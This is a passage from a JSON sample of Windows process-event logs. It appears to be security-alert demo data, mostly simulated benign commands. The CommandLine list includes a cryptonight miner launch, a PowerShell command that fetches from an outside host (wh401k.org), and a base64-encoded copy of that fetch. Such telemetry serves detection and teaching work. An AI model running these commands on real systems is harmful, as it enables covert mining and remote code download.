SERVICE\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\"],\"CommandLine\":[\"NaN\",\"cmd.exe /c c:\\\\Diagnostics\\\\WinSimulateAlerts.cmd c:\\\\W!ndows\\\\System32 2\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd /c echo Begin Security Demo tasks\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\".\\\\suchost.exe -a cryptonight -o bcn -u bond007.01 -p x -t 4\",\".\\\\powershell -Noninteractive -Noprofile -Command \\\"Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://wh401k.org/getps\\\"\",\".\\\\powershell -enc LU5vbmludGVyYWN0aXZlIC1Ob3Byb2ZpbGUgLUNvbW1hbmQgIkludm9rZS1FeHByZXNzaW9uIEdldC1Qcm9jZXNzOyBJbnZva2UtV2ViUmVxdWVzdCAtVXJpIGh0dHA6Ly93aDQwMWsub3JnL2dldHBzIg==\",\"cmd /c echo End Security Demo tasks\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\system32\\\\speech_onecore\\\\common\\\\SpeechModelDownload.exe\",\"C:\\\\Windows\\\\System32\\\\wsqmcons.exe\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinBenignActivity.cmd 1 200\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping 127.0.0.1 -n 8 \",\"reg c:\\\\diagnostics\\\\WinBenignActivity.cmd -10918 /22284\",\"ping 127.0.0.1 -n 17 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 0 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd -15855\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -15855\\\"\",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -6735 /25041\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -11793\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -17426 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"rundll32 \\\\26415\\\\9105.exe\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -18973 c:\\\\temp\\\\23899\\\\24432.ps1\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" C:\\\\diagnostics\\\\WinBenignActivity.cmd -18973 c:\\\\temp\\\\23899\\\\24432.ps1\\\"\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping 127.0.0.1 -n 14 \",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -17484 /10137\",\"ping 127.0.0.1 -n 14 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 14 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -15720\",\"ping 127.0.0.1 -n 14 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 14 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 14 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -11278 \",\"ping 127.0.0.1 -n 14 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 14 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 14 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 14 \",\"rundll32 \\\\15840\\\\26443.exe\",\"ping 127.0.0.1 -n 14 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -4630 c:\\\\temp\\\\25730\\\\15188.ps1\",\"ping 127.0.0.1 -n 14 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 14 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 14 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 19 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 23 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 14 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd -1140 \",\"ping 127.0.0.1 -n 18 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 28 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 14 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 17 \",\"rundll32 \\\\18091\\\\18975.exe\",\"ping 127.0.0.1 -n 26 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd -2752 c:\\\\temp\\\\12730\\\\16896.ps1\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" c:\\\\diagnostics\\\\WinBenignActivity.cmd -2752 c:\\\\temp\\\\12730\\\\16896.ps1\\\"\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping 127.0.0.1 -n 26 \",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -1926 /21875\",\"ping 127.0.0.1 -n 26 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 26 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -7320\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -7320\\\"\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -10353 /21160\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -14766\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -3438 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"rundll32 \\\\29395\\\\14699.exe\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -20237 c:\\\\temp\\\\2708\\\\27344.ps1\",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 26 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 26 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 26 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -18087 \",\"ping 127.0.0.1 -n 26 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 26 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 26 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 26 \",\"rundll32 \\\\24535\\\\23154.exe\",\"ping 127.0.0.1 -n 26 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -10518 c:\\\\temp\\\\25582\\\\18184.ps1\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" C:\\\\diagnostics\\\\WinBenignActivity.cmd -10518 c:\\\\temp\\\\25582\\\\18184.ps1\\\"\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping 127.0.0.1 -n 26 \",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -29592 /10339\",\"ping 127.0.0.1 -n 26 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 26 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -25460\",\"ping 127.0.0.1 -n 26 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 26 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 26 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -564 \",\"ping 127.0.0.1 -n 26 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 26 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 26 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 26 \",\"rundll32 \\\\12420\\\\28156.exe\",\"ping 127.0.0.1 -n 26 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -25005 c:\\\\temp\\\\13896\\\\18724.ps1\",\"ping 127.0.0.1 -n 26 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 26 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 26 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 26 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 26 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 26 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 29 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 8 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 19 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd 